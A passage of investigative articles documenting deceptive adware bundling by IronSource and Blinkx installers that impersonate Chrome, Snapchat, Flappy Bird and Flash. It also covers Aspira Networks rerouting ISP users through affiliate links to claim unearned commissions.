A Closer Look at IronSource Installation Tactics with Pat*

In public statements, IronSource promises to "empower software" through "faster" downloads, "smoother" installations, and increased "user trust." It sounds like a reasonable business — free software for users in exchange for advertising.

Yet a closer look at IronSource installations reveals ample cause for concern. Far from facilitating "user trust," IronSource installations are often strikingly deceptive: they promise to provide software IronSource and its partners have no legal right to redistribute (indeed, specifically contrary to applicable license agreements); they bundle all manner of adware that users have no reason to expect with genuine software; they bombard users with popup ads, injected banner ads, extra toolbars, and other intrusions. It’s the very opposite of mainstream legitimate advertising. We are surprised to see such deceptive tactics from a large firm that is, by all indications, backed by distinguished investors and top-tier bankers.

In the following sections, we present two representative IronSource bundles, then offer broader assessments and recommendations.

An IronSource-Brokered "Chrome Browser"

Install a "Chrome Browser" and you wouldn’t expect a bundle of adware. But that’s exactly what we found when we tested an IronSource bundle by that name.

IronSource snares users who are searching for Google Chrome IronSource snares users who are searching for Google Chrome

IronSource landing page repeatedly presents Google's Chrome trademark and logo, giving little indication that users have reached an independent installer. IronSource landing page repeatedly presents Google’s Chrome trademark and logo, giving little indication that users have reached an independent installer.

Installer also lacks any branding of its own, giving little indication that users have reached an independent installer. Installer also lacks any branding of its own, giving little indication that users have reached an independent installer.

IronSource's installer presents a series of screens like this, each touting a separate bundled adware. Eventually a user might notice something amiss -- but no 'cancel' button lets a user reverse the entire process. IronSource’s installer presents a series of screens like this, each touting a separate bundled adware program. Eventually a user might notice something amiss — but no "cancel" button lets a user reverse the entire process.

In testing on October 31, 2014, we began with a Google search for "download google chrome." A large ad promised "Download Google Chrome – Downloadb.net" (title) with details "New Google Chrome(R) 35 Version. Google Chrome 2014. Install Today! Chrome is still fast and loaded with new standard support. -PC Mag". Sublinks below the ad elaborated: "Download the New Version – Get the Latest Chrome(R) – 100% Free Installation". Thus, nothing in the text of the ad gives any suggestion that the ad would take a user to a third party rather than to genuine Google software. The display URL, "google-chrome-install.downloadb.net", might alert sophisticated users — but "downloadb.net" is generic enough that the warning is minimal, and bold type focuses attention on "google-chrome" (matching the user’s search terms).

The resulting landing page did not show anything amiss either. The landing page uses Google’s distinctive Chrome icon twice, as well as the large-type label "Google Chrome." On our standard 1024×768 test PC, no on-screen text offered any logo, any company name, or any product name other than Google Chrome.

We clicked the "Download Free" button to proceed, then run the resulting installer. After a perfunctory first screen (still without any affirmative indication that the software is not a genuine Google offering), the installer began to tout third party software. The installation solicitation was strikingly deceptive. First, the window’s two headings were "Google Chrome" and "Make your selection to continue", plus it repeated the distinctive Google Chrome icon at top-left. Notably, no large type indicated that the software is anything other than genuine Google software. Furthermore, the large scroll box on the right offered the bold-type heading "END USER LICENSE AGREEMENT" — more naturally understood to be a EULA for Chrome, the software the user requested and the software the user expected to receive. Small type at top-left mentioned "Astromedia new-tab add-on," but this could easily be overlooked in light of user expectations, prior statements, window headings, icon, and the EULA box heading. Nor did the bottom disclosure cure the problem: The bottom text mentioned Astromedia only in the second line of a disclosure where it is more likely to be overlooked. In addition, the disclosure’s links (to a EULA and privacy policy the user purportedly certifies having read and accepted) lacked any distinctive color or underline, so users are unlikely to recognize them as links. As a result, users have no reason to know that they are (purportedly) accepting lengthy external documents.

Next, the installer pushed another program, "Framed Display." The screen followed the same template critiqued in the prior paragraph, including deceptive headings, deficient disclosures, and unlabeled links. Moreover, the program name "Framed Display" is itself deceptive — a generic name, a combination of two standard words without secondary meaning, which gives no serious indication of the program’s function, origin, or even the fact that it is third-party software unrelated to Chrome.

The installer then touted two further programs, RegClean Pro and DriverSupport. These at least appeared with logos in the top-left, which might help some users realize that they are being asked to install third-party software. But like the prior screens, these both linked to (and asked users to agree to) contracts presented only via links not formatted as such. Both offers still appeared within a window entitled "Google Chrome," continuing the false suggestion that these programs are affiliated with or endorsed by Google.

Seeing the logos for RegClean and DriverSupport, some users might realize that they have received something other than Google Chrome. But the installer lacked a "Back" button to let a user return to prior screens and revoke the acceptances previously (purportedly) granted.

The install video shows the full install sequence, culminating in various popups, new programs, changed browser settings, and other interruptions. The computer becomes noticeably slower, and most users would find the computer much less useful. In fact we found 2,478 new files created as well as 2,465 registry values created — quite an onslaught. Among the most urgent problems is that, as best we can tell, a user cannot remove the DriverSupport’s window from the screen except by killing the process with Task Manager.

In a remarkable twist, the installer pushes the user to install additional software even after the main installation is complete. In particular, after the user receives the four offers described above, the installer runs a 30+ second download of the various programs to be installed. (In the video, this is 1:16 to 1:50.) The user then sees a "Finish" button. But far from ending the installation solicitations, "Finish" brings a solicitation for yet other adware, MyPCBackup. At the conclusion of an installation and after pushing a button labeled Finish, users naturally and reasonably expect only perfunctory final tasks, not requests to install more unrelated advertising software. Furthermore, the on-screen disclosures say nothing of adware, pop-up ads, or tracking of users’ browsing; and the links to EULA and privacy policy again lack any labeling to alert users that they are clickable. On the whole, users are poorly positioned to evaluate this offer, understand what they are asked to accept, or provide meaningful acceptance. Nor is this installer alone in presenting other solicitations after installation; we’ve seen other IronSource installers try the same scheme.

This bundle constitutes both software counterfeiting and trademark infringement. Contrary to the title of the initial ad and the large-type heading in every screen of the installer, this is not the genuine "Google Chrome" installer that Google provides; rather, it’s a wrapper with all manner of other software from third parties unaffiliated with Google. At every step, the installer features Google’s distinctive "Chrome" brand name and logo with no statement that Google authorized their use. And the installer redistributes Chrome despite a clear admonition, within the standard Chrome Terms of Service, that "You may not … distribute … this Content [Chrome] (either in whole or in part) unless you have been specifically told that you may do so by Google… in a separate agreement." The installer offers no suggestion, and certainly no affirmative statement, that Google has provide any such permission. Indeed, in a telling twist, we found that the installer never even showed the Chrome Terms of Service, contrary to Google’s standard requirement (implemented in all genuine Chrome installers) that users accept the ToS before receiving Chrome.

This bundle is also an objectively bad deal for consumers. A consumer seeking Chrome can easily obtain that exact program, on a standalone basis, without any bundled adware, toolbars, popups, injections, or other extra advertising or tacking. The installer adds nothing of genuine value to users; it delivers only the software that its adware partners pay it to deliver, and the partners pay to have their software delivered to users only because they correctly anticipate that users would not seek to install adware if it were not foisted upon them.

Although the IronSource company name appears nowhere in the installer’s on-screen displays, numerous factors indicate that this is indeed an IronSource installation. For example, installation temporary files include multiple references to "IC", and registry keys were created within the hierarchy HKEY_USERSSIDSoftwareInstallCore. (InstallCore is the IronSource service that provides adware bundling and adware installation.) Other temporary files were created within folders with prefix "ish******", "is**********", and "is*******", best understood as abbreviations for IronSource. Furthermore, while each installer connected to different hosts to obtain installation components, each installer’s hosts included at least one with an IP address used by IronSource (according to standard IP-WHOIS). Host names followed a pattern matching longstanding IronSource practice (as previously reported by, e.g., Sophos), including hosts called cdneu and cdnus, exactly as Sophos reported.

Moreover, it seems that some of the bundled adware is itself made by IronSource. For example, the Astromenda browser plug-in stores its settings in a Windows Registry section entitled SoftwareInstallCore — a fact most logically explained by Astromenda being made by IronSource’s InstallCore.

The Nonexistent "Snapchat Windows" App that Delivers Only Adware

Snapchat fans often wish for a Windows client. No such software exists, but that doesn’t stop an IronSource bundle from claiming to offer one, and thereby bombarding interested users with a variety of adware.

IronSource snares users who are searching for Snapchat. IronSource snares users who are searching for Snapchat.

IronSource landing page repeatedly presents Snapchat's trademark and logo, giving little indication that users have reached an independent installer. In fact there exists no genuine 'Snapchat for PC' software, and IronSource's bundle is most notable for delivering adware. IronSource landing page repeatedly presents Snapchat’s trademark and logo, giving little indication that users have reached an independent installer. In fact there exists no genuine "Snapchat for PC" software, and IronSource’s bundle is most notable for delivering adware.

In testing, we searched for "Snapchat Windows" and clicked an ad claiming to provide the "Latest 2014 PC version" of "Snapchat." The resulting landing page correctly describes Snapchat but says nothing of any bundled adware. Meanwhile, a prominent "McAfee SECURE" Logo purports to certify the trustworthiness of the site, notwithstanding the problems that follow. (We discuss McAfee’s strange role, both flagging this installation and simultaneously certifying it, at the end of this article.)

We clicked "DOWNLOAD NOW" and proceeded to the installer. The first install screen said nothing of any bundled adware. The subsequent screens (second, third, fourth, fifth, sixth) had the same problems detailed above, including lacking distinctive branding for the unrelated third-party software that’s touted, lacking distinctive format on links to contracts users purportedly accept, and lacking back buttons to serve users who realize something is amiss and want to change their mind. Additional shortcomings in this installation:

  • As we repeatedly demonstrated in the install video (1:35 to 1:47, 2:34, 2:47, 3:01), even if a user does click to activate the license, the installer remains superimposed always-on-top in the foreground, thereby blocking a user’s effort to read the document the user is purportedly accepting.
  • For one bundled program (video at 2:19 and 2:29), the agreements are hosted on an inoperational server, which completely prevents any attempt to read them.
  • The text of the installation disclosures is illogical. For example, the disclosure for MyPCBackup adware advises the user to "Click ‘Play’ on the video to see what MyPCBackup can do for you" — but no video or play button is shown.

This installer bundles even more software than the fake Chrome installer detailed above. We found the fake Snapchat bundling Astromenda, Framed Display, RegClean Pro, MyPCBackup, and Weatherbug.

As far as we can tell, the installer never actually provides Snapchat software. Rather, the installer provides unrelated software called BlueStacks (a program which lets users "install" and use Android apps on Windows PC). It’s no surprise that the installer doesn’t provide a Snapchat Windows app, since none exists. Yet this omission undermines the entire value proposition promised to the user. Notably, BlueStacks is itself freely available, without bundled adware.

Similar Installations

We have seen numerous similar installations. These installs share many factors:

  • They grab the attention of users searching leading search engines for common software including popular commercial applications like Adobe Reader, Chrome, Firefox, Flash, Internet Explorer, and Java as well as open source software such as 7zip, GIMP, and OpenOffice.
  • Often, the installations significantly overstate the need for the installation or the benefits it can provide. For example, some installation solicitations falsely claim that a media player is out of date or, as in the Snapchat example above, even promise software that does not actually exist.
  • They use generic domain names (our examples of downloadb.net and downloadape.org are typical) with no affirmative indication that they are not the official distributors of the specified software. Quite the contrary, their text, images, and layout suggest that they are the authoritative sources for the software they promise.
  • They fail to disclose the presence of bundled adware until midway through the download process, and they almost always lack "back" buttons to let a user reverse course once the bundled adware becomes apparent.
  • They fail to disclose the true identity of the companies behind the installs, including using domains with limited or no contact information, as well as domain Whois with privacy protection.

Ultimately, these bundled installations provide users with nothing of genuine value beyond the adware-free installs easily available from the original developers. They are a source of widespread user complaints on software discussion forums, as users with so much adware systematically report that their computers are slow and unreliable.

IronSource’s Responsibility

By all indications, IronSource has the right and ability to control these installations. Installation code is obtained from IronSource servers; the installer EXE acts as a bootstrap, downloading configuration and components at runtime. Indeed, the IronSource installer architecture entails all "creative" materials (such as installation text and images) hosted on IronSource servers, letting IronSource easily accept or reject configuration details.

IronSource is likely to blame third party "partners" for most or all of the defects we have listed, but our analysis indicates that IronSource is importantly responsible. First, IronSource’s servers and systems create the installation bundle; IronSource can easily refuse to create deceptive installations, including refusing to create bundles with names matching well-known software such as "Chrome." Moreover, by IronSource’s own admission, its systems select and optimize the offers presented to users: "InstallCore improves install completion rates by about 32%" with "customized installers [that] reinforce branding and user trust," optimized through "the installer A/B testing tool to continuously improve results." IronSource even indicates that its own staff design installations: "Every branded installer is backed by dedicated graphic designers and a team of UI/UX specialists [who] adjust and continually make improvements that drive more installs." And IronSource itself brokers the relationships between "premium advertisers" (making adware) and software publishers using IronSource installers.

Meanwhile, the apps at issue entail self-evident counterfeiting. It is widely known that Google does not allow third parties to bundle its Chrome browser with adware, and that there is no such thing as a Snapchat Windows app. Even the barest of examinations by IronSource staff would have revealed these implausible titles for the respective installers — red flags that the installations are not what they claim to be.

IronSource’s installers are "bootstraps" that check with an IronSource server before beginning an installation. (IronSource explains that its "installation client downloads in real-time a list of offers" to present to a given user.) By removing or modifying installer configuration files on an IronSource server, IronSource can disable any installer it determines to be deceptive or otherwise improper — even months after that installer was created. Thus, IronSource can easily block further installs using the deceptive practices we have flagged here, as well as similar practices by other installers.

Notably, IronSource’s involvement meets the common law tests for both contributory and vicarious liability, wherein a company is liable for the actions of its partners. Contributory liability arises when a company knows of illicit acts and when it assists in those acts. Here, IronSource surely knows of illicit conduct (including counterfeiting) both because it is obvious and because consumers and rights-holders have complained. IronSource’s knowledge of deceptive installation disclosures is even clearer because by all indications IronSource systems optimized or even designed the installation disclosures. As to IronSource’s assistance, note that IronSource helps partners by entering into agreements with adware providers to be paid to install their software, bundling adware into installers, and designing and optimizing installers. IronSource thus satisfies the tests for contributory liability. Meanwhile, vicarious liability arises when a company has the power to prevent illicit acts and when it benefits from those acts. Here, IronSource can stop the deceptive installations because each installation checks with IronSource servers to obtain adware to be presented to users, which gives IronSource with an easy opportunity to disable an installer. IronSource benefits from the installations because it retains a portion of the payment from adware vendors. IronSource thus also satisfies the test for vicarious liability. In addition, of course, IronSource might itself be directly liable for those acts that it does itself, e.g. designing or optimizing deceptive installations.

TRUSTe Trusted Download Violations

IronSource has sought and obtained TRUSTe Trusted Download certification, which claims to assure that software is "safe" so that users "feel more secure" and proceed with installations. Trusted Download requires compliance with numerous rules, and our inspection reveals that IronSource falls short.

For one, TRUSTe Trusted Download rules specifically prohibit "induc[ing] the User to install, download or execute software by misrepresenting the identity or authority of the person or entity providing the software." See rule 14.g. IronSource might argue that if any such misrepresentation occurred, it was made by an IronSource distributor, publisher, or other partner, but not by IronSource itself. But rule 14.j disallows certified software from being included in any bundle with software engaging in violations of any portion of rule 14. So even if it was IronSource’s partners who violated rule 14.g, their violation put IronSource in violation of rule 14.j.

Furthermore, TRUSTe Trusted Download requires disclosures that go well beyond what these installs actually provide. For example, rule 3.a.i.2 requires "prominent link[s]" to all reference notices providing full terms and conditions, whereas the examples above show links not labeled as such (without distinctive color or underlining), and thereby prevent users from recognizing the links as such. We also question whether IronSource partners’ changes of user browser configuration (home page, toolbars, etc.) satisfy the requirement of 3.a.i.1.A-D.

Here too, IronSource might argue that its distributors, publishers, or other partners are responsible for these violations. But Trusted Download rules specifically speak to a company’s responsibility for its partners’ disclosures. See rule 9. Under rule 9.a, IronSource is required to establish contractual provisions in agreements with partners to assure compliance with TRUSTe’s rules. Under 9.d, IronSource must demonstrate to TRUSTe that it has an effective process for assuring compliance. Under 9.e, IronSource must itself monitor compliance and report any known noncompliance to TRUSTe; failure to report is itself a violation.

A further violation comes from IronSource’s detection of virtualization environments where its software may be tested. Trusted Download rule 2.c.viii requires that certified software be compatible with virtualization tools such as VMware to facilitate testing. In contrast, IronSource systematically declines to show adware offers — its raison d’être — when running in virtualization environments. If TRUSTe tested IronSource using VMware, TRUSTe staff would see none of IronSource’s deceptive installation solicitations, and they would reach a mistaken assessment of IronSource’s purpose and effect.

We have forwarded these violations to TRUSTe and urged TRUSTe to revoke the certification of IronSource. Given the nature and scope of the violations, we suggest revocation without permission to reapply. TRUSTe’s distinguished members and Trusted Download founding supporters (including AOL, Verizon, and Yahoo) wouldn’t want to be associated with a company engaged in software counterfeiting, trademark infringement, adware bundling, and the other practices we have presented.

Violations of Other Industry Rules for Software Practices

Beyond TRUSTe, several key firms and industry groups offer standards for software practices. IronSource installations systematically fall short.

For example, Google’s Software Principles require "upfront disclosure" of the programs to be installed and their effects, whereas these IronSource installations disclose the programs one at a time — the very opposite of "upfront." Furthermore, Google’s "keeping good company" principle disallows bundling an app with others that violate Google’s principles and simultaneously blocking any IronSource attempt to deflect responsibility to others. Meanwhile, Google’s AdWords Counterfeit Goods policy prohibits any attempt to "pass [something] off as a genuine product of [a] brand owner," thereby disallowing IronSource installations that claim to be Google, Snapchat, or the like. Google’s AdWords Misrepresentation policy requires that an advertiser "first provid[e] all relevant information and obtain… the user’s explicit consent" (emphasis added) before prompting users to begin a download, whereas these IronSource installations include no such disclosures on landing pages and disclose bundled apps one by one during the installer. Other Google requirements ban deceptive domain names and display domains as well as unauthorized distribution of copyrighted content, which also occur here. We see strong arguments that IronSource installs fall short of each of these requirements.

Microsoft’s Bing has similar Editorial Guidelines, which these installations similarly violate. For example, Microsoft’s intellectual property guidelines disallow promoting counterfeit goods and further disallow copyright infringements (such as redistribution of another company’s software without its permission). Microsoft’s misleading content guidelines prohibit deceptive suggestions about a site’s relationship with a product provided by others and requires an explicit disclosure of that fact. Microsoft further limits use of brands and logos which tend to give a false sense of authorization. Microsoft’s software guidelines add special rules for installations including requirements for the timing and substance of disclosures, and Microsoft specifically bans adding additional software to a package produced by someone else. We see strong arguments that IronSource installs fall short of each of these requirements.

Facing these and other requirements, it’s hard to see how IronSource could claim to comply. In response, Google and Microsoft should ban IronSource from advertising through their respective search engines. They should enforce that ban both through diligent checks and through "cease and desist" orders advising IronSource and its partners and affiliates not to attempt to buy advertising through intermediaries or other company names.

The Role and Responsibility of Investors

IronSource’s efforts to date have relied on significant support from investors. Specific investors apparently decline to be listed (perhaps anticipating unwanted scrutiny like this article). But the Wall Street Journal reports that JP Morgan and Morgan Stanley are serving as bankers and raised $80 to $100 million in August 2014. IronSource reportedly plans an IPO for 2015 with anticipated valuation of $1.5 billion.

We wonder whether investors fully understand IronSource’s activities, users’ distaste for adware, and the lurking risks if users, software rights-holders, search engines, and others seek to block IronSource’s activities. Suppose, for example, that Google banned all IronSource installations from advertising in AdWords — a reasonable decision based on the deceptive installations flagged here. A few large losses like this could put a major crimp in IronSource’s plans.

Interest from investors also opens IronSource to new forms of vulnerability and accountability. A decade ago, notorious adware vendor Direct Revenue succeeded in raising significant funds from investors, some of whom later found their computers running Direct Revenue adware. In a notable email, Barry Osherow of TICC sought personal assistance from Direct Revenue CEO Joshua Abram in removing unwanted Direct Revenue adware. In another, a consumer complained to Insight Partners about their funding of Direct Revenue. Insight’s Ben Levin passed the message on to managing director Deven Parekh who instructed that Insight be removed from Direct Revenue’s web site. Deven specifically worried that “all I need is Bob Rubin getting this email,” referring to the former Secretary of the Treasury who later became a special limited partner at Insight. (These emails and hundreds of others became publicly available when the New York Attorney General sued Direct Revenue and released selected business records.) In my view, these investors were correct to worry that their adware would attract unwanted public scrutiny, and that risk remains for current adware investors.

Co-author Edelman has updated his Investors Supporting Spyware page to list IronSource and known information about its investors and bankers.

Next Steps

IronSource boasts that its installation service "installs better" in that it "improves install completion rates by about 32%." IronSource attributes increased installations to solving technical problems. But another plausible reason for more installs is that IronSource and its partners resort to exceptional deception including disguising their software as coming from others, presenting disclosures that are at best incomplete, and otherwise pushing the limits in foisting advertising software few users would willingly accept. In that context, a higher installation rate is nothing to celebrate; more installs just mean more users infected with unwanted adware.

To bring an end to these practices, a natural first step is to enforce existing rules for advertising standards and practices. Having established Trusted Download to check for this kind of misbehavior, TRUSTe is particularly well positioned to take action based on the violations detailed above. TRUSTe should at least revoke its erroneously-granted certification and perhaps also post an affirmative statement of noncompliance. Google and Microsoft should similarly ban these IronSource installations from their respective search engines.

Computer security companies appear to have at best partial success at detecting both IronSource and the additional programs that IronSource bundlers install. For example, on December 15, 2014, Mozilla blocked the Astromenda Search Addon (included in both bundles presented above) from being installed into any Firefox browsers, reporting that "This add-on is silently installed and is considered malware, in violation of the Add-on Guidelines." That said, IronSource quickly moved to pushing new toolbar, this time labeled Vosteran, with similar functionality. As of the posting of this article, Vosteran has not been blocked by Mozilla. For a broader assessment of security companies’ assessment of IronSource software, we used VirusTotal to check detections of the fake Snapchat installer described above. VirusTotal reported just 14 of 54 security programs detecting it as unesirable software. For example, McAfee detected it, but Microsoft and Symantec did not.

We are particularly struck by McAfee’s inconsistent approach to IronSource software. On one hand, as we note above, McAfee was one of a minority of security vendors that detected IronSource’s fake Snapchat app, so if a McAfee user attempts to install the app, a warning will protect the user. That said, McAfee SiteAdvisor’s online safety tool inexplicably fails to detect downloadape.org, the site hosting the installer. (Disclosure: co-author Edelman previously served as an advisor to SiteAdvisor, but has had no connection to the product or McAfee since 2010.) In addition, as we note above, the fake Snapchat landing page features a prominent "McAfee SECURE" logo which purports to certify the trustworthiness of the site. Once McAfee’s software flagged the app as untrustworthy — correctly, in our view — we think SiteAdvisor’s page should have been updated and any McAfee SECURE certification should have been rescinded.

We and others have been fighting adware for more than a decade. But with capable and well-funded adversaries like IronSource pushing adware through new and creative tactics, there’s ample work left to do.

* – Pat participated as an equal coauthor but prefers to be listed only with his first name.

Aspira Networks Charging Merchants for Traffic That’s Otherwise Free

Affiliate marketing is supposed to be low-risk for merchants: in theory, merchants only pay affiliates when a user makes a purchase. Specifically, an affiliate should earn a commission only if 1) the user browses the affiliate’s site, 2) the user clicks the affiliate’s specially-coded link to the merchant, and 3) the user makes a purchase from the merchant. But rogue affiliates find ways to bypass these requirements — be it cookie-stuffing, adware popups, typosquatting, or network-based traffic interception. In this piece, I show Delaware-based Aspira Networks approach: configuring its partners’ networks so that if a user makes a purchase from a targeted merchant’s site, the merchant has to pay Aspira an affiliate commission — even though Aspira did nothing to cause or encourage the user’s purchase.

The method is straightforward. Aspira partners with network operators to monitor and reroute users’ browsing. If a user requests a targeted merchant, Aspira intercedes — redirecting the user to an Aspiralabs.com “finder” page, through an affiliate click link, then back to the merchant. The affiliate redirect causes merchants to conclude, mistakenly, that Aspira caused users’ subsequent purchases.

See examples of Aspira’s redirects in action, targeting the following merchants:
   GoDaddy – video, packet log
   Home Depot – video, packet log
   Travelocity – video, packet log

In testing, I found that Aspira targets roughly a quarter of large mainstream US affiliate merchants. I found Aspira systematically using CJ publisher account 3965551. In testing, I did not find Aspira currently targeting merchants using LinkShare, though an early Aspira investor pitch (dated August 2009 in metadata) indicates that Aspira has worked with LinkShare as well as Google Affiliate Network.

Merchants have no reason to pay for Aspira’s traffic. Though affiliate network reports may attribute sales to Aspira, Aspira does not actuallycause additional or incremental purchases. Rather, these are purchases that merchants would have received anyway. Aspira tells prospective merchants that they will “sell more products” by working with Aspira, but I see no evidence to support that claim. Quite the contrary, in fact; in my testing, Aspira did not genuinely promote any merchants. Aspira claimed commission only after a user had already reached a merchant’s site.

Notably, Aspira’s networks violate longstanding and broadly-applicable network policies. For example, the Commission Junction Publisher Service Agreement indicates that commission is only due for “clicks through links” (provision 3.a). Aspira’s automatic redirects entail no genuine user “click” on any link; there’s an automatic redirect but not an actual click. Other CJ rules disallow “transactions … not in good faith” including all manner of automatic and nonincremental leads (provision 1.d.ii). Here too, Aspira falls short.

In August 2011, Zhang et al. uncovered Paxfire similarly redirecting users through affiliate links. Under litigation pressure and media scrutiny, Paxfire found itself banned from Commission Junction, LinkShare, and Google Affiliate Network. I suggest the same resolution for Aspira.

Aspira’s site focuses on public installations (coffee-shops and the like) where, in principle, one might imagine that network access was made available by payments from Aspira. But I found Aspira redirecting traffic from an ordinary office served by Indiana ISP Smithville Communications. So far as I know, Smithville never notified its customers that it would be monitoring their communications, redirecting them through affiliate links, or sharing their browsing activity with Aspira. (Smithville’s privacy policy makes no mention of Aspira or sending users’ browsing to third parties.) Nor did Smithville offer customers a discount for allowing Smithville and Aspira to monitor and redirect their browsing. Other users report (and criticize) similar redirects when using standard residential and commercial ISPs Access Media 3, Arvig, and OnShore Networks.

Aspira’s site gives little detail about its revenue from redirecting users through affiliate links. Partner Cash4trafik says “typical operators have realized historically …. about $1.00 – $10.00 per subscriber per year.” Notice that revenue must be shared among affiliate networks, Aspira, Cash4traffik, and ISPs — so if an ISP gets $5, the others might take another $15 along the way. Indeed, early Aspira financial projections — posted to the web and readily found by web search — indicate that Aspira planned to retain a 40% to 67% share of affiliate commissions.

Meanwhile, Aspira’s financial projections show a particularly brazen attempt to claim payments despite minimal effort. As of 2010, Aspira projected 2013 revenue climbing to $63 million with expense reportedly to stay below $7 million. Business plans are often overly optimistic, but an 89% profit margin is difficult to reconcile with genuine efforts to find incremental customers. In contrast, it’s wholly consistent with the practice I observed in which Aspira claims commission without any expense to find or attract users.

Whatever the benefits to Aspira and its partners, the effect on merchants is clearly negative: Aspira causes extra advertising expense without providing incremental purchases. Affiliate merchants should reject Aspira’s approach, save their marketing budgets for publishers with genuine incremental value, and encourage Aspira to shift to other activities.

Thanks to Thomas Rice for bringing this practice to my attention and facilitating my collection of proof of Aspira’s practices.

Blinkx Adware Revisited: Installation and Operation

My January 2014 “Darker Side of Blinkx” explored Blinkx’s adware business and other controversial practices. The posting prompted significant interest, but unexpectedly much of the subsequent discussion focused on why I did the work rather than Blinkx’s actual practices. With this piece, I further examine of Blinkx’s adware, deceptive installations, and other tactics that harm both users and advertisers.

In remarks last week, Blinkx attributed Zango’s downfall to “lax oversight of rogue partners.” In today’s article, I show similar problems among Blinkx’s installations. I begin with deceptive installation of Blinkx adware when users request a (nonexistent) Flappy Bird game — an abusive bait-and-switch installation that burdens a user with half a dozen different adware programs yet never provides the promised game. I then show similarly deceptive installation of Blinkx adware when users request a (nonexistent) Snapchat app for Windows. I compare these practices to FTC requirements and evaluate Blinkx’s defenses. I then to demonstrate Blinkx that adware undermines HTTPS security by collecting and retransmitting users’ seemingly-secure browsing activity, as well as showing deceptive advertisements that targeted web sites would never allow along with numerous ad-fraud popups that charge merchants for traffic they would otherwise receive for free. I then find Blinkx adware loading Google ads in pop-ups, which specifically violates Google ad placement rules. I conclude with recommendations and next steps.

Note that this article examines only Blinkx’s ex-Zango adware business — not its ex-AdOn traffic brokering or its various other activities.

Deceptive Installation: Fake Flappy Bird App Installs Blinkx Adware

Softdlspro claims to offer a 'Flappy Birds Game Download.' The bundle provides myriad adware including Blinkx adware, but no Flappy Birds. Softdlspro claims to offer a “Flappy Birds Game Download.” The bundle provides myriad adware including Blinkx adware, but no Flappy Birds.

Deceptive Fast Media Converter installation solicitation pretends to be a Flash Player update.  It installs Blinkx adware (and more). Deceptive Fast Media Converter installation solicitation pretends to be a Flash Player update. It installs Blinkx adware (and more).

Deceptive Super Backup installation puts the Next button above disclosures, and makes no mention of any popups or any advertising at all.Deceptive Super Backup installation puts the Next button above disclosures, and makes no mention of any popups or any advertising at all.

A decade after the dawn of adware, one might ask why users agree to install programs that slow their computers, reduce their privacy, and bombard them with pop-up ads. A close look at Blinkx installs is instructive: Often, users aren’t fairly told what they’re getting. Though FTC rules call for clear disclosure of key effects, in prominent text outside a license agreement, Blinkx and its partners often omit these statements. That omission isn’t just an occasional error — it’s a common characteristic of many Blinkx installations. Yet the omission is no great surprise: If Blinkx and its partners fairly told users what they’d be getting, most users would decline. The following sections show installations with this problem (among others).

On February 10, 2014, Flappy Bird creator Dong Nguyen withdrew his popular game from Apple and Google’s app stores. In response, users went to search engines to try to get the game. Users searching on Google often saw ads that promoted a Softdlspro page that purported to offer “Flappy Bird Game Downloads” but actually had no such thing. Through this process, unfortunate users received Blinkx adware.

In the top screenshot at right and in a first video, I demonstrate that a search for “flappy birds” took users to a Softdlspro download page. In a second video, I then show that this Softdlspro bundle bombards users with an onslaught of adware. In my testing, a user who attempts to install this game is asked to install Fast Media Converter adware (video at 2:42), Program Starter (3:51), Yahoo Toolbar (3:55), Gamevance/Trafficvance ArcadeParlor adware, “Clean Water Action Reminder” from We-Care (a browser plug-in that monitors users’ browsing and claims affiliate commission on users’ purchases) (4:02), SLOW-PCfighter (which purports to offer computer repair) (4:03), and Super Backup (4:08).

This Softdlspro “Flappy Bird” bundle appears to install two different programs with Blinkx adware. First, Softdlspro touts Fast Media Converter, which installs Blinkx ex-Zango adware. I credit that the FMC site and EULA give no immediate indication that FMC installs Blinkx adware. But taken as whole, the installation leaves litle doubt. Relevant factors: FMC retrieves configuration files and advertisements from URLs that match standard ex-Zango patterns. FMC’s pop-up ads match the longstanding Zango format including the same user-interface and delivery methods. (Examples: FMC popups defraud Amazon by claiming commission on Amazon’s organic traffic. FMC popups claim a “New Version Available” and use the Chrome name and logo. FMC popups claim “your Video Player has a faster version available” and use the Internet Explorer name and logo. FMC popups claim “Outdated Browser Detected” and repeatedly use the Internet Explorer name and logo.) In addition, the FMC installer downloads component EXEs from Premium-apps.net, which is Ignition Installer run by Verti Group, a Blinkx subsidiary.

Second, Softdlspro’s “Flappy Bird” touts Super Backup which is also monetized by Blinkx. Super Backup more readily discloses the link to Blinkx: Its Privacy Policy (visible in the video at 4:17) describes the program’s advertising component as “LeadImpact Software,” and its Terms of Use say the same thing. Furthermore, LeadImpact’s privacy policy says LeadImpact comes from Pinball Corp, and LeadImpact’s DNS servers are also within pinballcorp.com. Notably, Blinkx’s 2010 annual report lists Pinball as a wholly-owned subsidiary. LinkedIn statements are in accord: Tony Gozzo describes his employer as “the Leadimpact division” of Blinkx, and Ramon Navarro says he works for “Leadimpact – a division of Blinkx.”

The Softdlspro “Flappy Bird” bundle is deceptive for multiple reasons. For one, it never provides the game the user requested and the offer purports to provide. Any associated “consent” to receive adware is therefore ill-gotten; as Softdlspro didn’t hold up its end of the bargain.

Furthermore, the Softdlspro offers are less than forthright. Consider the Fast Media Converter solicitation that appears in the video at 2:42 and in the second screenshot at right. (In general this is a freestanding offer — it appears on its own web page, separate from the Softdlspro install window, so users can and do receive this offer from other sources. That said, the Softdlspro installer systematically opens this web page, so users in the fake Flappy Birds install sequence are bound to see this pitch too.) The FMC offer reads “An update to Adobe Flash Player is available,” prominently references “Adobe Flash Player 12”, and uses the distinctive Adobe logo. But the software at issue is not provided by, or in any way affiliated with, Adobe. Indeed, Fast Media Converter has no genuine connection to Adobe Flash Player, and FMC uses the Adobe name, logo, and trademark only to appear familiar and legitimate. Users may be induced to install software because they are told it will “update” software they genuinely want on their computers. But when Blinkx and its distributors falsely claim to provide updates to unrelated software, any user’s “agreement” is ill-gotten and invalid.

FMC’s disclosures are also cause for concern. FMC mentions advertisements in a single clause midway through its installation disclosure (third paragraph, next-to-last sentence) — a place where users are unlikely to notice. Furthermore, the disclosure is vague: FMC “is ad-supported software and displays advertisements during your web browsing experience.” Missing from this disclosure are the two key facts FMC needs to convey to users before asking them to accept the adware: First, that ads appear in pop-ups, a format users are known to dislike. Second, that the adware tracks users’ browsing in detail and at all times. Such disclosures are required to alert users to the material consequences of the installation, and such disclosures are specifically required under longstanding FTC rules. See analysis below.

In some respects, the Super Backup installation is even more deceptive. For the on-screen display, see the video at 4:08 and the third screenshot at right. Prominent on-screen disclosures are placed above the oversized green “Next” button. But these disclosures only mention innocuous features about a program launcher. (These features are associated with Program Starter, a bundler that solicits a series of further installations.)

